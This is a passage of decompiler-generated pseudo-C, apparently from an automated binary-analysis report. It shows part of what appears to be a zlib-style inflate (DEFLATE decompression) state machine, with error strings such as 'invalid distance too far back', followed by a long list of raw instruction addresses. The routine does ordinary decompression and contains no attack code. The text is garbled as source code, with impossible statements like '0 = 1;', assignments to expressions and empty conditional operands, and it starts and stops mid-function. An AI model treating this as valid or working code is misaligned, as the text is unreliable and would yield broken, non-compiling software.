                                                                                                          											__eflags = __al & 0x000000f0;
                                                                                                          											if((__al & 0x000000f0) != 0) {
                                                                                                          												goto L252;
                                                                                                          											}
                                                                                                          											L248:
                                                                                                          											__edi = 0;
                                                                                                          											__ecx = __al & 0x000000ff;
                                                                                                          											__ebx = __eax;
                                                                                                          											__edi = 1;
                                                                                                          											__ebx = __eax >> 8;
                                                                                                          											__edx = __eax;
                                                                                                          											__esi = __bl & 0x000000ff;
                                                                                                          											__ecx = (__al & 0x000000ff) + __esi;
                                                                                                          											__eax = __eax >> 0x10;
                                                                                                          											__edi = 1 << __cl;
                                                                                                          											__ecx = __esi;
                                                                                                          											__edi = (1 << __cl) - 1;
                                                                                                          											 *(__ebp - 0x34) = __edx;
                                                                                                          											(1 << __cl) - 0x00000001 &  *(__ebp - 0xc) = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                          											__ecx =  *(__ebp - 0x30);
                                                                                                          											__edi = __eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl);
                                                                                                          											__eax =  *( *(__ebp - 0x30) + (__eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl)) * 4);
                                                                                                          											__ecx = __eax;
                                                                                                          											__edi =  *(__ebp - 0x10);
                                                                                                          											__ecx = __eax >> 8;
                                                                                                          											__esi = __cl & 0x000000ff;
                                                                                                          											__ecx = __bl & 0x000000ff;
                                                                                                          											__ebx =  *(__ebp - 0x24);
                                                                                                          											__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                          											__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                          											if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                          												L251:
                                                                                                          												__esi =  *(__ebp + 8);
                                                                                                          												__ecx = __dh & 0x000000ff;
                                                                                                          												__edx =  *(__ebp - 0xc);
                                                                                                          												__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                          												__edi = __edi - __ecx;
                                                                                                          												__eflags = __edi;
                                                                                                          												 *(__ebx + 0x1bc4) = __ecx;
                                                                                                          												goto L252;
                                                                                                          											} else {
                                                                                                          												goto L249;
                                                                                                          											}
                                                                                                          											while(1) {
                                                                                                          												L249:
                                                                                                          												__esi =  *(__ebp - 4);
                                                                                                          												__eflags = __esi;
                                                                                                          												if(__esi == 0) {
                                                                                                          													goto L322;
                                                                                                          												}
                                                                                                          												L250:
                                                                                                          												__esi = __esi - 1;
                                                                                                          												__ecx = __edi;
                                                                                                          												 *(__ebp - 4) = __esi;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												__esi =  *(__ebp - 8);
                                                                                                          												 *(__ebp - 0x10) = __edi;
                                                                                                          												__edi = __dh & 0x000000ff;
                                                                                                          												 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__esi & 0x000000ff) << __cl);
                                                                                                          												__esi = __esi + 1;
                                                                                                          												__eax =  *(__ebp - 0x32) & 0x0000ffff;
                                                                                                          												 *(__ebp - 8) = __esi;
                                                                                                          												0 = 1;
                                                                                                          												__dl & 0x000000ff = __edi + (__dl & 0x000000ff);
                                                                                                          												__esi = 1 << __cl;
                                                                                                          												__ecx = __edi;
                                                                                                          												(1 << __cl) - 1 = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                          												__esi = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                          												__esi = (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff);
                                                                                                          												__eax =  *(__ebx + 0x4c);
                                                                                                          												__eax =  *( *(__ebx + 0x4c) + ((((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff)) * 4);
                                                                                                          												__eax = __eax >> 8;
                                                                                                          												__ecx = __cl & 0x000000ff;
                                                                                                          												__ecx = __edi + (__cl & 0x000000ff);
                                                                                                          												__edi =  *(__ebp - 0x10);
                                                                                                          												__eflags = __ecx - __edi;
                                                                                                          												if(__ecx > __edi) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L251;
                                                                                                          											}
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L239:
                                                                                                          										__eax =  *(__ebp - 0x18);
                                                                                                          										__eflags = __eax - 0x102;
                                                                                                          										if(__eax < 0x102) {
                                                                                                          											goto L242;
                                                                                                          										}
                                                                                                          										L240:
                                                                                                          										__ebx =  *(__ebp - 0x1c);
                                                                                                          										_push( *(__ebp - 0x28));
                                                                                                          										 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                          										__ebx =  *(__ebp - 0x24);
                                                                                                          										 *(__esi + 0x10) = __eax;
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										 *__esi =  *(__ebp - 8);
                                                                                                          										 *(__esi + 4) = __ecx;
                                                                                                          										_push(__esi);
                                                                                                          										 *(__ebx + 0x38) = __edx;
                                                                                                          										 *(__ebx + 0x3c) = __edi;
                                                                                                          										__eax = E00883840();
                                                                                                          										__eflags =  *__ebx - 0xb;
                                                                                                          										__eax =  *(__esi + 0xc);
                                                                                                          										__edx =  *(__ebx + 0x38);
                                                                                                          										__edi =  *(__ebx + 0x3c);
                                                                                                          										_pop(__ecx);
                                                                                                          										 *(__ebp - 0x1c) =  *(__esi + 0xc);
                                                                                                          										__eax =  *(__esi + 0x10);
                                                                                                          										_pop(__ecx);
                                                                                                          										__ecx =  *(__esi + 4);
                                                                                                          										 *(__ebp - 0x18) =  *(__esi + 0x10);
                                                                                                          										__eax =  *__esi;
                                                                                                          										 *(__ebp - 8) =  *__esi;
                                                                                                          										 *(__ebp - 4) = __ecx;
                                                                                                          										 *(__ebp - 0xc) = __edx;
                                                                                                          										 *(__ebp - 0x10) = __edi;
                                                                                                          										if( *__ebx == 0xb) {
                                                                                                          											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                          										}
                                                                                                          										goto L135;
                                                                                                          									case 0x15:
                                                                                                          										L259:
                                                                                                          										__esi =  *(__ebx + 0x48);
                                                                                                          										__eflags = __esi;
                                                                                                          										if(__esi == 0) {
                                                                                                          											L265:
                                                                                                          											__eax =  *(__ebx + 0x40);
                                                                                                          											 *(__ebx + 0x1bc8) =  *(__ebx + 0x40);
                                                                                                          											 *__ebx = 0x16;
                                                                                                          											goto L266;
                                                                                                          										}
                                                                                                          										L260:
                                                                                                          										__eflags = __edi - __esi;
                                                                                                          										if(__edi >= __esi) {
                                                                                                          											L264:
                                                                                                          											__eax = 0;
                                                                                                          											__ecx = __esi;
                                                                                                          											__eax = 1;
                                                                                                          											__edi = __edi - __esi;
                                                                                                          											1 << __cl = (1 << __cl) - 1;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          											__edx = __edx >> __cl;
                                                                                                          											 *(__ebx + 0x40) =  *(__ebx + 0x40) + __eax;
                                                                                                          											_t580 = __ebx + 0x1bc4;
                                                                                                          											 *_t580 =  *(__ebx + 0x1bc4) + __esi;
                                                                                                          											__eflags =  *_t580;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											goto L265;
                                                                                                          										}
                                                                                                          										L261:
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										while(1) {
                                                                                                          											L262:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L263:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											__eax =  *(__ebp - 8) + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - __esi;
                                                                                                          											if(__edi < __esi) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L264;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 0x16:
                                                                                                          										L266:
                                                                                                          										__ecx =  *(__ebx + 0x58);
                                                                                                          										__eax = 0;
                                                                                                          										__esi =  *(__ebx + 0x50);
                                                                                                          										1 = 1 << __cl;
                                                                                                          										__eax = (1 << __cl) - 1;
                                                                                                          										 *(__ebp - 0x30) = __esi;
                                                                                                          										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          										__eax =  *(__esi + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                          										1 = 1 >> 8;
                                                                                                          										__ecx = __cl & 0x000000ff;
                                                                                                          										__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          										if((__cl & 0x000000ff) <= __edi) {
                                                                                                          											L270:
                                                                                                          											__eflags = __al & 0x000000f0;
                                                                                                          											if((__al & 0x000000f0) != 0) {
                                                                                                          												L275:
                                                                                                          												__esi =  *(__ebp + 8);
                                                                                                          												__eax = __eax >> 8;
                                                                                                          												__ecx = __cl & 0x000000ff;
                                                                                                          												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          												__edi = __edi - __ecx;
                                                                                                          												__edx = __edx >> __cl;
                                                                                                          												 *(__ebp - 0xc) = __edx;
                                                                                                          												 *(__ebp - 0x10) = __edi;
                                                                                                          												__eflags = __al & 0x00000040;
                                                                                                          												if((__al & 0x00000040) == 0) {
                                                                                                          													L277:
                                                                                                          													__ecx = __eax;
                                                                                                          													 *__ebx = 0x17;
                                                                                                          													__ecx = __eax >> 0x10;
                                                                                                          													__eax = __al & 0x000000ff;
                                                                                                          													__eax = __al & 0xf;
                                                                                                          													__eflags = __eax;
                                                                                                          													 *(__ebx + 0x44) = __ecx;
                                                                                                          													 *(__ebx + 0x48) = __eax;
                                                                                                          													goto L278;
                                                                                                          												}
                                                                                                          												L276:
                                                                                                          												 *(__esi + 0x18) = "invalid distance code";
                                                                                                          												goto L17;
                                                                                                          											}
                                                                                                          											L271:
                                                                                                          											__edi = 0;
                                                                                                          											__ecx = __al & 0x000000ff;
                                                                                                          											__ebx = __eax;
                                                                                                          											__edi = 1;
                                                                                                          											__ebx = __eax >> 8;
                                                                                                          											__edx = __eax;
                                                                                                          											__esi = __bl & 0x000000ff;
                                                                                                          											__ecx = (__al & 0x000000ff) + __esi;
                                                                                                          											__eax = __eax >> 0x10;
                                                                                                          											__edi = 1 << __cl;
                                                                                                          											__ecx = __esi;
                                                                                                          											__edi = (1 << __cl) - 1;
                                                                                                          											 *(__ebp - 0x34) = __edx;
                                                                                                          											(1 << __cl) - 0x00000001 &  *(__ebp - 0xc) = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                          											__ecx =  *(__ebp - 0x30);
                                                                                                          											__edi = __eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl);
                                                                                                          											__eax =  *( *(__ebp - 0x30) + (__eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl)) * 4);
                                                                                                          											__ecx = __eax;
                                                                                                          											__edi =  *(__ebp - 0x10);
                                                                                                          											__ecx = __eax >> 8;
                                                                                                          											__esi = __cl & 0x000000ff;
                                                                                                          											__ecx = __bl & 0x000000ff;
                                                                                                          											__ebx =  *(__ebp - 0x24);
                                                                                                          											__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                          											__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                          											if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                          												L274:
                                                                                                          												__ecx = __dh & 0x000000ff;
                                                                                                          												__edx =  *(__ebp - 0xc);
                                                                                                          												__edi = __edi - __ecx;
                                                                                                          												__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                          												_t626 = __ebx + 0x1bc4;
                                                                                                          												 *_t626 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          												__eflags =  *_t626;
                                                                                                          												goto L275;
                                                                                                          											} else {
                                                                                                          												goto L272;
                                                                                                          											}
                                                                                                          											while(1) {
                                                                                                          												L272:
                                                                                                          												__esi =  *(__ebp - 4);
                                                                                                          												__eflags = __esi;
                                                                                                          												if(__esi == 0) {
                                                                                                          													goto L322;
                                                                                                          												}
                                                                                                          												L273:
                                                                                                          												__esi = __esi - 1;
                                                                                                          												__ecx = __edi;
                                                                                                          												 *(__ebp - 4) = __esi;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												__esi =  *(__ebp - 8);
                                                                                                          												 *(__ebp - 0x10) = __edi;
                                                                                                          												__edi = __dh & 0x000000ff;
                                                                                                          												 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__esi & 0x000000ff) << __cl);
                                                                                                          												__esi = __esi + 1;
                                                                                                          												__eax =  *(__ebp - 0x32) & 0x0000ffff;
                                                                                                          												 *(__ebp - 8) = __esi;
                                                                                                          												0 = 1;
                                                                                                          												__dl & 0x000000ff = __edi + (__dl & 0x000000ff);
                                                                                                          												__esi = 1 << __cl;
                                                                                                          												__ecx = __edi;
                                                                                                          												(1 << __cl) - 1 = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                          												__esi = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                          												__esi = (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff);
                                                                                                          												__eax =  *(__ebx + 0x50);
                                                                                                          												__eax =  *( *(__ebx + 0x50) + ((((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff)) * 4);
                                                                                                          												__eax = __eax >> 8;
                                                                                                          												__ecx = __cl & 0x000000ff;
                                                                                                          												__ecx = __edi + (__cl & 0x000000ff);
                                                                                                          												__edi =  *(__ebp - 0x10);
                                                                                                          												__eflags = __ecx - __edi;
                                                                                                          												if(__ecx > __edi) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L274;
                                                                                                          											}
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L267:
                                                                                                          										__esi =  *(__ebp - 4);
                                                                                                          										while(1) {
                                                                                                          											L268:
                                                                                                          											__eflags = __esi;
                                                                                                          											if(__esi == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L269:
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											__ecx = __edi;
                                                                                                          											__esi = __esi - 1;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											 *(__ebp - 4) = __esi;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                          											__ecx =  *(__ebx + 0x58);
                                                                                                          											__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                          											 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                          											__eax =  *(__ebx + 0x50);
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											0 = 1;
                                                                                                          											1 << __cl = (1 << __cl) - 1;
                                                                                                          											__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                          											__eax =  *( *(__ebx + 0x50) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                          											__ecx = __eax;
                                                                                                          											__edx =  *(__ebp - 0xc);
                                                                                                          											__eax >> 8 = __cl & 0x000000ff;
                                                                                                          											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          											if((__cl & 0x000000ff) > __edi) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L270;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 0x17:
                                                                                                          										L278:
                                                                                                          										__ecx =  *(__ebx + 0x48);
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											L284:
                                                                                                          											 *__ebx = 0x18;
                                                                                                          											goto L285;
                                                                                                          										}
                                                                                                          										L279:
                                                                                                          										__eflags = __edi - __ecx;
                                                                                                          										if(__edi >= __ecx) {
                                                                                                          											L283:
                                                                                                          											__eax = 0;
                                                                                                          											__edi = __edi - __ecx;
                                                                                                          											__eax = 1;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											1 << __cl = (1 << __cl) - 1;
                                                                                                          											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          											__edx = __edx >> __cl;
                                                                                                          											 *(__ebx + 0x44) = __eax +  *(__ebx + 0x44);
                                                                                                          											_t649 = __ebx + 0x1bc4;
                                                                                                          											 *_t649 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          											__eflags =  *_t649;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											goto L284;
                                                                                                          										}
                                                                                                          										L280:
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										while(1) {
                                                                                                          											L281:
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L323;
                                                                                                          											}
                                                                                                          											L282:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebx + 0x48);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											__eax =  *(__ebp - 8) + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											__eflags = __edi - __ecx;
                                                                                                          											if(__edi < __ecx) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L283;
                                                                                                          										}
                                                                                                          										goto L323;
                                                                                                          									case 0x18:
                                                                                                          										L285:
                                                                                                          										__ecx =  *(__ebp - 0x18);
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L286:
                                                                                                          										__eax =  *(__ebp - 0x28);
                                                                                                          										__eax =  *(__ebp - 0x28) - __ecx;
                                                                                                          										__ecx =  *(__ebx + 0x44);
                                                                                                          										__eflags = __ecx - __eax;
                                                                                                          										if(__ecx <= __eax) {
                                                                                                          											L295:
                                                                                                          											__eax =  *(__ebp - 0x1c);
                                                                                                          											__eax =  *(__ebp - 0x1c) - __ecx;
                                                                                                          											__eflags = __eax;
                                                                                                          											 *(__ebp - 0x34) = __eax;
                                                                                                          											__eax =  *(__ebx + 0x40);
                                                                                                          											L296:
                                                                                                          											__ecx = __eax;
                                                                                                          											L297:
                                                                                                          											__esi =  *(__ebp - 0x18);
                                                                                                          											__eflags = __ecx - __esi;
                                                                                                          											__ecx =  >  ? __esi : __ecx;
                                                                                                          											__esi = __esi - __ecx;
                                                                                                          											__eax = __eax - __ecx;
                                                                                                          											 *(__ebp - 0x18) = __esi;
                                                                                                          											__esi =  *(__ebp - 0x34);
                                                                                                          											 *(__ebx + 0x40) = __eax;
                                                                                                          											__ebx =  *(__ebp - 0x1c);
                                                                                                          											__esi =  *(__ebp - 0x34) - __ebx;
                                                                                                          											__eflags = __esi;
                                                                                                          											do {
                                                                                                          												L298:
                                                                                                          												__al =  *((intOrPtr*)(__esi + __ebx));
                                                                                                          												 *__ebx = __al;
                                                                                                          												__ebx = __ebx + 1;
                                                                                                          												__ecx = __ecx - 1;
                                                                                                          												__eflags = __ecx;
                                                                                                          											} while (__ecx != 0);
                                                                                                          											__esi =  *(__ebp + 8);
                                                                                                          											 *(__ebp - 0x1c) = __ebx;
                                                                                                          											__ebx =  *(__ebp - 0x24);
                                                                                                          											__eflags =  *(__ebx + 0x40) - __ecx;
                                                                                                          											if( *(__ebx + 0x40) == __ecx) {
                                                                                                          												 *__ebx = 0x14;
                                                                                                          											}
                                                                                                          											goto L134;
                                                                                                          										}
                                                                                                          										L287:
                                                                                                          										__ecx = __ecx - __eax;
                                                                                                          										__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x2c));
                                                                                                          										if(__ecx <=  *((intOrPtr*)(__ebx + 0x2c))) {
                                                                                                          											L290:
                                                                                                          											__eax =  *(__ebx + 0x34);
                                                                                                          											__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                          											if(__ecx <=  *((intOrPtr*)(__ebx + 0x30))) {
                                                                                                          												__eax = __eax - __ecx;
                                                                                                          												__eax = __eax +  *((intOrPtr*)(__ebx + 0x30));
                                                                                                          												__eflags = __eax;
                                                                                                          											} else {
                                                                                                          												__ecx = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                          												__eax = __eax +  *((intOrPtr*)(__ebx + 0x28));
                                                                                                          												__eax = __eax - __ecx;
                                                                                                          											}
                                                                                                          											 *(__ebp - 0x34) = __eax;
                                                                                                          											__eax =  *(__ebx + 0x40);
                                                                                                          											__eflags = __ecx - __eax;
                                                                                                          											if(__ecx <= __eax) {
                                                                                                          												goto L297;
                                                                                                          											} else {
                                                                                                          												L294:
                                                                                                          												goto L296;
                                                                                                          											}
                                                                                                          										}
                                                                                                          										L288:
                                                                                                          										__eflags =  *(__ebx + 0x1bc0);
                                                                                                          										if( *(__ebx + 0x1bc0) == 0) {
                                                                                                          											goto L290;
                                                                                                          										}
                                                                                                          										L289:
                                                                                                          										 *(__esi + 0x18) = "invalid distance too far back";
                                                                                                          										goto L17;
                                                                                                          									case 0x19:
                                                                                                          										L301:
                                                                                                          										__eflags =  *(__ebp - 0x18);
                                                                                                          										if( *(__ebp - 0x18) == 0) {
                                                                                                          											goto L322;
                                                                                                          										}
                                                                                                          										L302:
                                                                                                          										__esi =  *(__ebp - 0x1c);
                                                                                                          										__al =  *(__ebx + 0x40);
                                                                                                          										 *(__ebp - 0x1c) =  *(__ebp - 0x1c) + 1;
                                                                                                          										 *(__ebp - 0x18) =  *(__ebp - 0x18) - 1;
                                                                                                          										 *( *(__ebp - 0x1c)) = __al;
                                                                                                          										__esi =  *(__ebp + 8);
                                                                                                          										 *__ebx = 0x14;
                                                                                                          										goto L135;
                                                                                                          									case 0x1a:
                                                                                                          										L303:
                                                                                                          										__eflags =  *(__ebx + 8);
                                                                                                          										if ( *(__ebx + 8) == 0) goto L306;
                                                                                                          										__eflags =  *(__ebp - 0x7d000000) & __bh;
                                                                                                          									case 0x1b:
                                                                                                          										L307:
                                                                                                          										__eax = 0;
                                                                                                          										__eflags =  *(__ebx + 8);
                                                                                                          										if( *(__ebx + 8) == 0) {
                                                                                                          											L318:
                                                                                                          											 *__ebx = 0x1c;
                                                                                                          											goto L319;
                                                                                                          										}
                                                                                                          										L308:
                                                                                                          										__eflags =  *(__ebx + 0x10);
                                                                                                          										if( *(__ebx + 0x10) == 0) {
                                                                                                          											goto L318;
                                                                                                          										}
                                                                                                          										L309:
                                                                                                          										__eflags = __edi - 0x20;
                                                                                                          										if(__edi >= 0x20) {
                                                                                                          											L314:
                                                                                                          											__eflags = __edx -  *((intOrPtr*)(0x1c + __ebx));
                                                                                                          											if(__edx ==  *((intOrPtr*)(0x1c + __ebx))) {
                                                                                                          												L317:
                                                                                                          												 *(__ebp - 0xc) = __eax;
                                                                                                          												__edi = __eax;
                                                                                                          												goto L318;
                                                                                                          											}
                                                                                                          											L315:
                                                                                                          											 *(__esi + 0x18) = "incorrect length check";
                                                                                                          											L17:
                                                                                                          											 *_t800 = 0x1d;
                                                                                                          											L134:
                                                                                                          											_t806 =  *(_t841 - 4);
                                                                                                          											goto L135;
                                                                                                          										}
                                                                                                          										L310:
                                                                                                          										__eax =  *(__ebp - 8);
                                                                                                          										while(1) {
                                                                                                          											L311:
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L322;
                                                                                                          											}
                                                                                                          											L312:
                                                                                                          											__eax =  *__eax & 0x000000ff;
                                                                                                          											 *(__ebp - 4) = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__eax = __eax << __cl;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__ecx =  *(__ebp - 4);
                                                                                                          											__edx = __eax + __edx;
                                                                                                          											__eax =  *(__ebp - 8);
                                                                                                          											__eax =  *(__ebp - 8) + 1;
                                                                                                          											 *(__ebp - 0xc) = __edx;
                                                                                                          											 *(__ebp - 8) = __eax;
                                                                                                          											 *(__ebp - 0x10) = __edi;
                                                                                                          											__eflags = __edi - 0x20;
                                                                                                          											if(__edi < 0x20) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											L313:
                                                                                                          											__eax = 0;
                                                                                                          											__eflags = 0;
                                                                                                          											goto L314;
                                                                                                          										}
                                                                                                          										goto L322;
                                                                                                          									case 0x1c:
                                                                                                          										L319:
                                                                                                          										__eax = 0;
                                                                                                          										__eax = 1;
                                                                                                          										goto L321;
                                                                                                          									case 0x1d:
                                                                                                          										L320:
                                                                                                          										_push(0xfffffffd);
                                                                                                          										_pop(__eax);
                                                                                                          										L321:
                                                                                                          										 *(__ebp - 0x20) = __eax;
                                                                                                          										L322:
                                                                                                          										_t806 =  *(_t841 - 4);
                                                                                                          										goto L323;
                                                                                                          									case 0x1e:
                                                                                                          										goto L330;
                                                                                                          								}
                                                                                                          							}
                                                                                                          							L136:
                                                                                                          							_push(0xfffffffe);
                                                                                                          							goto L137;
                                                                                                          						}
                                                                                                          						L173:
                                                                                                          						_t796 =  >  ? _t806 : _t775;
                                                                                                          						_t797 =  >  ?  *((void*)(_t841 - 0x18)) : _t796;
                                                                                                          						 *(_t841 - 0x34) = _t797;
                                                                                                          						if(_t797 == 0) {
                                                                                                          							goto L322;
                                                                                                          						}
                                                                                                          						L174:
                                                                                                          						memcpy( *(_t841 - 0x1c),  *(_t841 - 8), _t797);
                                                                                                          						_t799 =  *(_t841 - 0x34);
                                                                                                          						_t843 = _t843 + 0xc;
                                                                                                          						 *(_t841 - 8) =  *(_t841 - 8) + _t799;
                                                                                                          						_t806 =  *(_t841 - 4) - _t799;
                                                                                                          						 *((intOrPtr*)(_t841 - 0x18)) =  *((intOrPtr*)(_t841 - 0x18)) - _t799;
                                                                                                          						 *(_t841 - 0x1c) =  *(_t841 - 0x1c) + _t799;
                                                                                                          						_t800[0x10] = _t800[0x10] - _t799;
                                                                                                          						_t822 =  *(_t841 - 0xc);
                                                                                                          						 *(_t841 - 4) = _t806;
                                                                                                          						goto L135;
                                                                                                          					}
                                                                                                          					L169:
                                                                                                          					 *(_t837 + 0x18) = "invalid stored block lengths";
                                                                                                          					goto L17;
                                                                                                          				}
                                                                                                          			}



























                                                                                                          0x00881f3b
                                                                                                          0x00881f3b
                                                                                                          0x00881f3b
                                                                                                          0x00881f3b
                                                                                                          0x00881f3b
                                                                                                          0x00881f3d
                                                                                                          0x00881f40
                                                                                                          0x00881f42
                                                                                                          0x00881f44
                                                                                                          0x00881f47
                                                                                                          0x00881f4d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00881f4f
                                                                                                          0x00881f4f
                                                                                                          0x00881f52
                                                                                                          0x00881f52
                                                                                                          0x00881f52
                                                                                                          0x00881f57
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00881f5d
                                                                                                          0x00881f5d
                                                                                                          0x00881f61
                                                                                                          0x00881f64
                                                                                                          0x00881f66
                                                                                                          0x00881f68
                                                                                                          0x00881f6b
                                                                                                          0x00881f6d
                                                                                                          0x00881f70
                                                                                                          0x00881f73
                                                                                                          0x00881f74
                                                                                                          0x00881f77
                                                                                                          0x00881f7d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00881f7d
                                                                                                          0x00882a52
                                                                                                          0x00882a52
                                                                                                          0x00882a52
                                                                                                          0x00882a5b
                                                                                                          0x00882a5e
                                                                                                          0x00882a61
                                                                                                          0x00882a64
                                                                                                          0x00882a66
                                                                                                          0x00882a6b
                                                                                                          0x00882a6e
                                                                                                          0x00882a71
                                                                                                          0x00882a74
                                                                                                          0x00882a7a
                                                                                                          0x00882a91
                                                                                                          0x00882a9b
                                                                                                          0x00882aa5
                                                                                                          0x00882ab4
                                                                                                          0x00882ab4
                                                                                                          0x00882ab6
                                                                                                          0x00882ab9
                                                                                                          0x00882abc
                                                                                                          0x00882abf
                                                                                                          0x00882ac2
                                                                                                          0x00882ac5
                                                                                                          0x00882ac8
                                                                                                          0x00882ace
                                                                                                          0x00882ad2
                                                                                                          0x00882ad7
                                                                                                          0x00882ada
                                                                                                          0x00882adb
                                                                                                          0x00882ae1
                                                                                                          0x00882aea
                                                                                                          0x00882ae3
                                                                                                          0x00882ae3
                                                                                                          0x00882ae3
                                                                                                          0x00882aef
                                                                                                          0x00882af2
                                                                                                          0x00882af4
                                                                                                          0x00882af4
                                                                                                          0x00882ad2
                                                                                                          0x00882afa
                                                                                                          0x00882b01
                                                                                                          0x00882b01
                                                                                                          0x00000000
                                                                                                          0x00882afc
                                                                                                          0x00882afc
                                                                                                          0x00882aff
                                                                                                          0x00882b06
                                                                                                          0x00882b0b
                                                                                                          0x00882b12
